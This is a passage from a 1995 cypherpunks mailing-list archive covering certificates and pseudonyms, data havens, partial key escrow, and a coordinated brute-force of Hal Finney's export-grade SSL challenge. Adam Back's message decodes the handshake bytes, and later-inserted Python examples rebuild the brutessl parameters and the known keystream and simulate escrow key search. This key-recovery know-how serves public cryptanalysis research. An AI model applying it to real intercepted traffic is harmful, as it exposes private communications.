> speak, with no signs of a turnaround ahead.  Only the sheer size of
> the economy keeps people from believing it. 

Just a nomenclature peeve - I'm not sure of the precise time and 
place the (first|second|third) world meme originated, but it seems to
predate 1970, and until very recently its meaning was clear:

First world: Western (and Westernized) nations - mainly the US, Canada, Western Europe, 
Japan, Australia, & New Zealand

Second world: Communist bloc (I can still remember the Cultural 
Revolution. Prior to that, the Communists seemed a monolithic force, 
marching in lockstep.)

Third world: The rest, mostly poor nations. 

Back then, the world was a simpler place. 


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 21 Aug 95 11:56:39 PDT
To: Carl Ellison <cme@tis.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508211437.AA29550@tis.com>
Message-ID: <199508211856.MAA08294@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> As for what good that key is --

<snip>

> No economic impact, you say?

<snip>

> No money transfer, you say?

<snip>

> Again, in the Internet, nobody knows you're a dog-faced alien sea creature.


Thank you for posting that.  I've been increasingly frustrated with people
who assume that they have some need for a one-to-one 
'nym<->Real-Life-human-body mapping.  I would have been posting on this
topic myself, but I am busy.


Thanks again, and I hope you go ahead and start PGP-clearsigning your posts
so that my high opinion of you can become more firmly fixed.


:-)


Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMDjWw/WZSllhfG25AQFK/AQArnre8FU4fs/w93xHy7MgE0pjbHpSrvmw
U2flrQcbr+erwgzzNaFjgM5th2vScgTmLXWkg4IAmLpUM7pz4aVZM/5mj9Pg6T8J
fQS1DK7Lt6oAEqzqWjW/7xM1dxIyZkwyjJmO45TnqbBFjUjguqZ39QDacDhywhgr
uCErN4fwQ1o=
=096y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Mon, 21 Aug 95 11:19:20 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NEXT CHALLENGE: plan of action?
In-Reply-To: <25403.9508211621@exe.dcs.exeter.ac.uk>
Message-ID: <199508211751.NAA17649@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


> I read on Saturday Ian Goldbergs post about starting out on the
> challenge using Damiens code.
> 
> It doesn't matter a great deal which code is used as such, but the
> main thing is to ensure that this is a coordinated effort.  The aim of
> the challenge (which I requested and Hal kindly provided just before
> popping off for a week or so's holiday) was to see how fast a SSL
> challenge could be broken.  Not how *soon*, note the distinction.
> 
> That means that if for instance we count the time that Ian has been
> clocking up since Saturday, the real time will be slowed by approx 2
> days.  We really need to do this with a starting-line like affair, so
> that someone is running a server, and everyone gets the code compiled
> etc, and then the server starts offering the challenge and all the
> clients fire off.
> 
> That way we have a less straggly start up which makes for better
> bruteing figures.
> 
> Agreed so far?

Sorry I missed the fast/soon distinction.  I've stopped the search after
searching keys starting with 0xaf down to 0xa5, and will join the group
search after I get settled in after moving to Berkeley tomorrow.  I
encourage the people who pointed their clients at me (thanks!) to stop
them, and to join the group.

In the interests of not adding a few days to the time, we should ignore
the fact that a bit of the keyspace has already been searched, and
start again.

   - Ian "On your marks, get set, ..."



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 20 Aug 95 21:05:46 PDT
To: mfroomki@umiami.ir.miami.edu (Michael Froomkin)
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <Pine.3.89.9508191641.A620955565-0100000@umiami.ir.miami.edu>
Message-ID: <199508210400.OAA03317@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello Michael Froomkin <mfroomki@umiami.ir.miami.edu>
  and Rich Salz <rsalz@osf.org>
  and cypherpunks@toad.com

Original reason at end (after the reply).

> But this is precisely the issue: what does the *certificate* get any of 
> these people that a simple digital signature does not provide?

Protection from spoofing.

> On Sat, 19 Aug 1995, Rich Salz wrote:
> 
> > I think there are many people who might be willing to use an
> > "anon CA" should it exist:
> > 	Whistleblowers, perhaps Deep Throat would have used email

Certification is needed to avoid another person intercepting, re-signing,
and substituting hir own key.

> > 	Any number of writers who have used pseudonyms and now want to
> > 		get paid in ecash; Mark Twain?

Certification is needed to avoid another person diverting the ecash
(a disputed unsigned key is practically useless). In fact a much simpler
attack is denial-of-service: simply dispute the key (send another one
to the keyservers), and let the resulting uncertainty cut off the profits.


Also, if you insist on govt-is-root, you need certified pseudonyms
to set up a pseudonymous CA (ie a CA whose real identity is unknown).


Hope that makes sense...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Mon, 21 Aug 95 12:10:15 PDT
To: cypherpunks@toad.com
Subject: Re: Newton 2
Message-ID: <v02130500ac5e436d94d4@[199.1.11.207]>
MIME-Version: 1.0
Content-Type: text/plain


<<crossed to cypherpunks>>

>At 8:56 AM 8/21/95, Robert Patoine wrote:
>
>>Metroworks do Have a C Compiler for the Newton Hardware developed for
>>Sony-Magic Cap OS
>
>Magic Cap works on Magic Cap PDAs.  The newton is not one of them.
>Motorola uses magic cap for their PDAs, and I think AT&T does as well, but
>that's an uncertainty.
>

Considering that AT&T markets PersonaLink as an e-mail service for
MagicCap users i suspect they do support MagicCap in at least one of
their PDAs.  PersonaLink is, i believe, related to Telescript, which is
the scripting language for MagicCap (OK, it's a bit more than a scripting
language, but i'm not that into it).

I've heard a few times that not having a C compiler prevents the
implementation of PGP.  Why?  Do the RSA people refuse to license a non-C
implementation?  If so, can they still enforce their patent against someone
who implemented it on a platform that didn't have a C compiler?

But then i hear that the Newton will have some support for C development
sometime this year.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 21 Aug 95 11:23:56 PDT
To: vince@offshore.com.ai>
Subject: Whither Barbados?
Message-ID: <v02120d03ac5e6a1ca0e6@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I've cc'd (former cypherpunk) Vince Cate on Anguilla on this for obvious
reasons.

I got a bit of blurbuge in the USnail from the Barbados Investment and
Development Corporation (BIDC) on their 3rd Barbados Information Services
Conference, (Subtitled "Surfing the Global Net from Caribbean Shores" ;-),
February 26/27 1996.

The headers in the blurb were: Investment Management in Emerging Markets --
Information Technology Challenges, Network Security on the Global Net, New
Opportunities in Wireless Communications, Barbados -- the Caribbean hub
for Internet Access.

They promise a "Full Conference Programme available October 1, 1995", and
they seem to have a mailbot at info_bisc@caribnet.net.

Having inadvertently <ahem> plugged their stuff with no idea whether it's a
waste of time or not, I have a few thoughts about this and about
data/banking havens in general.

First, here's what I know about internet access in the Caribbean, gleaned
from discussions with Vince, and by lurking on various caribbean newsgroups
(see soc.culture.caribbean), web pages, and mail groups:

First off, bandwidth down there sucks. This is probably because there
really aren't many people there, the ones that are there are pretty poor,
and they can't buy much phone time.  This is compounded by monopolies,
Cable and Wireless being the biggest, built on cozy relationships with
government officials, if not actual creatures of those government officials
themselves, amortizing their <exaggeration mode on> 30 year old centrex
switches with 50 year schedules <e.m. off>. To be fair, they have to have
long distance lines to the mainland, and those cost, whether they're
copper, fiber, or satellite.

All the shenanigans of third world politics apply there. Trinidad and
Tobago had an attempted coup recently, Barbados, I believe, is in the
throes of a constitutional crisis where the speaker of their legislature
can't be impeached because she won't convene the committee to impeach
her...

Not to mention hurricanes, and in Montserrat, a volcano going off at the
moment...

The obvious reason I'm interested in this is regulatory arbitrage, of
course.  If there's a government that will let internet commerce and
privacy flourish there, then it flourishes everywhere on the net, national
borders or no.

I hear tell that Barbados is serious about converting its information
technology business from data entry and forms processing to
web-cluefullness. Given that their business development people don't have
their own domain name, they probably have a bit to go.

So, I have a little exercise...

If we were to tell the government of Barbados what it had to do to promote
the creation of internet commerce, what would we say?  Anyone here could
probably crank out a prima facie set of recommendations, but I figure to
beat this to death canonically and have a little fun at the same time.

So, here are a few categories to get started.  I'm trying to keep it relevant
to this group's charter.

Infrastructure
 Power
 Long distance
 Local wire
 Local wireless
Regulatory
 Financial Privacy Laws
 Telecommunications Competition
 Civil/Human Rights
   Privacy
   Business Deregulation
   Government intervention in the economy
Culture
 Religious/Cultural tolerance (the Netherlands are tolerant, for instance)
 Education (talent pool)

Well, that's a place to start.  I'll try to plug in my 2 cents in another
posting...

Cheers,
Bob Hettinga






-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Mon, 21 Aug 95 11:23:53 PDT
To: cypherpunks@toad.com
Subject: Partial Key Escrow
Message-ID: <ckCAut70BwwM80o3IB@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent discussion of the SSL Challenge and the revival of the
Software Key Escrow issue brought the following idea to mind.  For the
purposes of this suggestion let's just assume that the goal is to
provide some kind of Government Access to Keys (GAK) for a widely
deployed crypto system such as clipper phones. 

How about if instead of escrowing the whole key with the
government/escrow agent you only save some of the bits of the key?  I am
thinking that the government would insist that at a minimum all key bits
in excess of some N be escrowed, where N is around 48.  So if I was
using IDEA with 128-bit keys, I'd need to escrow at least 80 bits and
reveal all 128 bits only to the receiver.  The export version of RC4 is
similar except that 40 bits are hidden and 88 bits are "escrowed" as
plaintext. 

I see the advantage of this is that it might just be palatable to the
government.  In particular, 48 bits wouldn't be any significant burden
on the NSA or FBI for legally authorized wiretaps (I recall that
something like 1000 were performed in some recent year).  It would be a
simple matter for the FBI to budget enough hardware to do brute force
attacks on a few thousand keys a year with a time-to-crack of a few
hours (I doubt most wiretaps are obtained with more time urgency than
this). 

The big advantage to the user is that this provides a well-defined
limit on the effort required to violate their privacy.  The biggest
problem with the clipper-type GAK system is that everyone assumes that
in the worst case keys could be obtained illegally with essentially zero
cost.  There are numerous scenarios where the administrative controls
that protect keys break down and the public is left with no privacy at
all.  In this case, however, there is a significant, well-known, and
quantitative (but, unfortunately, time-variable) cost in obtaining a key
even if the administrative controls are completely compromised. 

While this doesn't make the privacy of any particular target much safer
it seems it would significantly improve the safety of the public privacy
in aggregate. 

Ted Anderson 
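
[Added example, not part of Ted Anderson's message: a sketch of the
partial-escrow split and the bounded search it leaves the key holder's
counterpart to do.  The function names, the sample key and the SHA-256
check value (standing in for trial decryption of intercepted traffic)
are assumptions, and the demo hides 16 bits rather than 48 so it
finishes quickly.]

```python
import hashlib

# Constructed 128-bit sample key (not from the post).
SAMPLE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")


def escrow_profile(key_bits, hidden_bits):
    """Sizes implied by the proposal for a given key length and N."""
    if not 0 <= hidden_bits <= key_bits:
        raise ValueError("hidden_bits must lie between 0 and key_bits")
    return {
        "escrowed_bits": key_bits - hidden_bits,
        "worst_case_trials": 1 << hidden_bits,
        "average_trials": (1 << hidden_bits) // 2 if hidden_bits else 1,
    }


def split_key(key, hidden_bits):
    """Return (escrowed, hidden): high bits to deposit, low bits kept back."""
    escrow_profile(len(key) * 8, hidden_bits)  # validates the range
    value = int.from_bytes(key, "big")
    return value >> hidden_bits, value & ((1 << hidden_bits) - 1)


def check_value(key):
    """Assumed stand-in for 'does this key decrypt the intercept sensibly'."""
    return hashlib.sha256(b"check" + key).digest()[:8]


def recover(escrowed, hidden_bits, key_len, target):
    """Search the hidden bits; return (key, trials) or raise LookupError.

    The loop bound is the point of the scheme: even with the escrow
    database fully exposed, each key still costs up to 2**hidden_bits
    trials.
    """
    if escrowed.bit_length() > key_len * 8 - hidden_bits:
        raise ValueError("escrowed value is too wide for this key length")
    for guess in range(1 << hidden_bits):
        candidate = ((escrowed << hidden_bits) | guess).to_bytes(key_len, "big")
        if check_value(candidate) == target:
            return candidate, guess + 1
    raise LookupError("no candidate matched: wrong escrow record or intercept")


if __name__ == "__main__":
    print("IDEA, N=48:      ", escrow_profile(128, 48))
    print("export RC4, N=40:", escrow_profile(128, 40))
    escrowed, _hidden = split_key(SAMPLE_KEY, 16)
    key, trials = recover(escrowed, 16, 16, check_value(SAMPLE_KEY))
    print("recovered", key.hex(), "after", trials, "trials")
```
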
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@exe.ex.ac.uk
Date: Mon, 21 Aug 95 06:56:54 PDT
Subject: NEXT CHALLENGE...
Message-ID: <9508211354.AA12454@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Please note mail to me may bounce unless you are very careful with using
addr aba@exe.ex.ac.uk, or aba@atlas.ex.ac.uk, as there are machines out here
due to a physical breakin - a "RAM raid", I tried posting this on Sat, but
the mailer was already out and mail is buffered, so may come out twice]

A breakdown of Hal's challenge, could someone please check my logic
in deriving an Andrew Roos-style config file for brutessl 1.0 and
check my interpretation against Hal's interpretation in the previous
challenge.

Hal's previous challenge is indexed from his home page:
	
	http://www.portal.com/~hfinney/

I think the challenge file should look like this:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Below I will give my reasoning for each field.  Each field as it is
derived will be quoted with >>>

Could a few people check that I have made no mistakes.

Andrew Roos' code is on:

	http://www.brute.cl.cam.ac.uk/brute/

as "brutessl.tar.gz", use "save next link as" in netscape (hold shift
key down and click in Netscape 1.1).

Could someone with a PC, and a 32 bit MS Visual C++ compiler handy
compile a PC executable from the tarred files, some people won't have
access to TAR under DOS, and a precompiled binary would be useful.
Please send the binary to Piete if you do this (be sure to turn on all
optimisations).  I tried but my VC++ is not 32 bit, is it possible to
produce 32 bit binaries which can be run from DOS with VC++ at all?  Are the
binaries you get with win 95 / win NT likely to run under DOS ?

The keyserver will not be doling yet but please pickup the software
ready to start.

There is a unix based client, and a windows NT based client both
available from that page.



----------------------------------------------------------------------

First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 


0x80 0x1c       Length field: 28 bytes follow in the packet.
0x01            MSG_CLIENT_HELLO
0x00 0x02       CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00       SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10       CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80  CIPHER-SPECS-DATA
                SESSION-ID-DATA
0x07 .. 0xc6	CHALLENGE-DATA [16 bytes]

CHALLENGE is:


>>> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6


First message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

This is interpreted as follows:

0x82 0x14       Packet length, 532 bytes follow.
0x04            MSG-SERVER-HELLO
0x00            SESSION-ID-HIT
0x01            CERTIFICATE-TYPE
0x00 0x02       SERVER-VERSION-MSB SERVER-VERSION-LSB
0x01 0xf6       CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10       CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0x8a     CERTIFICATE-DATA [502 bytes]
0x02 0x00 0x80  CIPHER-SPECS-DATA
0xd5...0xa4     CONNECTION-ID-DATA [16 bytes]

CONNECTION-ID is:

>>> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

This is interpreted as follows:

0x80 0x55       Packet length, 85 bytes follow.
0x02            MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80  CIPHER-KIND
0x00 0x0b       CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40       ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00       KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0xfb...0x36     CLEAR-KEY-DATA [11 bytes]
0x5a...0x2a     ENCRYPTED-KEY-DATA [64 bytes]
                KEY-ARG-DATA

So CLEAR-MASTER is:

>>> CLEAR-MASTER     fbc009916010a6153f8f36


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

This is interpreted as follows:

0x80 0x21       Packet length, 33 bytes follow
0x9a...0x82     RC4 encrypted MAC [16 bytes]
0x00            RC4 encrypted MSG-SERVER-VERIFY (0x05)
0x65...0x1b     RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
                [16 bytes]


Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0x07 0xea 0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f
0xc6 

Ciphertext (from SERVER-VERIFY packet):

0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2 0x33 0xb2
0x1b

SERVER-VERIFY is the encrypted MSG-SERVER-VERIFY plus the first seven
bytes of the encrypted CHALLENGE-DATA:

>>> SERVER-VERIFY      006599b6d2f2a736



So the completed challenge file is:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Adam
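
[Added example, not part of Adam's message and not code from brutessl:
a parser that re-derives the four parameter-file fields from the
handshake records quoted above, checking every length field on the way.
The function names are assumptions; the SERVER-HELLO keeps the posted
header, cipher spec and connection id but replaces the 502 certificate
bytes with zero filler of the same length.]

```python
import struct

# Records copied from the post (hex; bytes.fromhex ignores the spaces).
CLIENT_HELLO = bytes.fromhex(
    "801c 01 0002 0003 0000 0010 020080 07ea7b9d65eb61fabb4174e8453a5fc6")
CLIENT_MASTER_KEY = bytes.fromhex(
    "8055 02 020080 000b 0040 0000 fbc009916010a6153f8f36"
    "5a19068e58c4fad073 d46d20972f8595b3a597b5e0639161b7"
    "763c4e628b022b0598d4144463f3437e a0a83f16b2434b2476aeba8c8971de25"
    "6bce89778a302a")
SERVER_VERIFY = bytes.fromhex(
    "8021 9ac5f7d16a5b2643576765b63f9ae382 006599b6d2f2a736a07dd994cfe233b21b")
# Constructed stand-in: posted header and trailer, zero-filled certificate.
SERVER_HELLO = (bytes.fromhex("8214 04 00 01 0002 01f6 0003 0010") + bytes(502)
                + bytes.fromhex("020080 d5e638d68ca8a1aeca2ef8c8e29602a4"))

MAC_LEN = 16  # the MAC precedes the data in the encrypted record


def record_body(record):
    """Strip the 2-byte record header and check the declared length."""
    if len(record) < 2 or not record[0] & 0x80:
        raise ValueError("only 2-byte record headers (high bit set) handled")
    declared = ((record[0] & 0x7F) << 8) | record[1]
    if len(record) - 2 != declared:
        raise ValueError(f"header declares {declared}, got {len(record) - 2}")
    return record[2:]


def unpack(record, fmt, msg_type, n_var):
    """Split a handshake body into fixed header values and variable fields.

    The last n_var header values are the lengths of the variable fields,
    which follow the fixed header in the same order.
    """
    body = record_body(record)
    size = struct.calcsize(fmt)
    if len(body) < size:
        raise ValueError("record too short for its fixed header")
    head = struct.unpack_from(fmt, body)
    if head[0] != msg_type:
        raise ValueError(f"expected message type {msg_type}, got {head[0]}")
    fields, pos = [], size
    for length in head[-n_var:]:
        if pos + length > len(body):
            raise ValueError("length field runs past the end of the record")
        fields.append(body[pos:pos + length])
        pos += length
    if pos != len(body):
        raise ValueError("unparsed bytes after the last field")
    return head[1:-n_var], fields


def brutessl_fields(client_hello, server_hello, client_master_key,
                    server_verify):
    """Rebuild the four parameter-file fields from the four records."""
    _, (c_specs, _sid, challenge) = unpack(client_hello, ">BHHHH", 1, 3)
    _, (_cert, s_specs, conn_id) = unpack(server_hello, ">BBBHHHH", 4, 3)
    (kind,), (clear_key, _enc_key, _key_arg) = unpack(
        client_master_key, ">B3sHHH", 2, 3)
    for specs in (c_specs, s_specs):
        if kind not in [specs[i:i + 3] for i in range(0, len(specs), 3)]:
            raise ValueError("CIPHER-KIND was not offered by both sides")
    data = record_body(server_verify)[MAC_LEN:]
    if len(data) != 1 + len(challenge):
        raise ValueError("SERVER-VERIFY data is not type byte + challenge")
    return {
        "CLEAR-MASTER": clear_key.hex(),
        "CHALLENGE": challenge.hex(),
        "CONNECTION-ID": conn_id.hex(),
        "SERVER-VERIFY": data[:8].hex(),
    }


def known_keystream(server_verify, challenge):
    """XOR the known plaintext (0x05 + challenge) out of the verify bytes."""
    data = record_body(server_verify)[MAC_LEN:][:8]
    plain = (b"\x05" + challenge)[:8]
    return bytes(c ^ p for c, p in zip(data, plain))


if __name__ == "__main__":
    fields = brutessl_fields(CLIENT_HELLO, SERVER_HELLO,
                             CLIENT_MASTER_KEY, SERVER_VERIFY)
    for name, value in fields.items():
        print(f"{name:<16} {value}")
```
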





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 20 Aug 95 22:00:14 PDT
Subject: Re: WhiSSLing in the Dark
In-Reply-To: <199508182201.AAA27435@utopia.hacktic.nl>
Message-ID: <199508210459.OAA03641@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com

Anybody get the feeling someone is writing off their computers real fast?

...
> In home computer terms, Doligez guesses a network of
> about 80 Intel Pentium-based machines would be equivalent
...
> at around $10,000, meaning there are many more economical
...


Okay,
  80 Pentiums, at 2000 each, makes 160 000.
  8 days per attack, 10 000 per attack, makes cost of attack 1250/day

  160 000 / 1 250 = 128 days.

Anybody's Pentiums actually wear out after half a year?

You could question my 2000 figure, but even at 5000 it'd still be just
a year. Cost of capital doesn't change by more than 10% in that time.


Hope I'm making sense... and sorry about flogging the dead horse...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 21 Aug 95 12:29:22 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508211856.MAA08294@nagina.cs.colorado.edu>
Message-ID: <9508211920.AA27347@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 21 Aug 1995 12:56:21 -0600
>From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>


>Thanks again, and I hope you go ahead and start PGP-clearsigning your posts

Yes, I've been remiss.  It's an old belief -- that signing is expensive.
Now that I'm using emacs extensions and RMAIL, it's really easy -- but I
still follow the old habit.

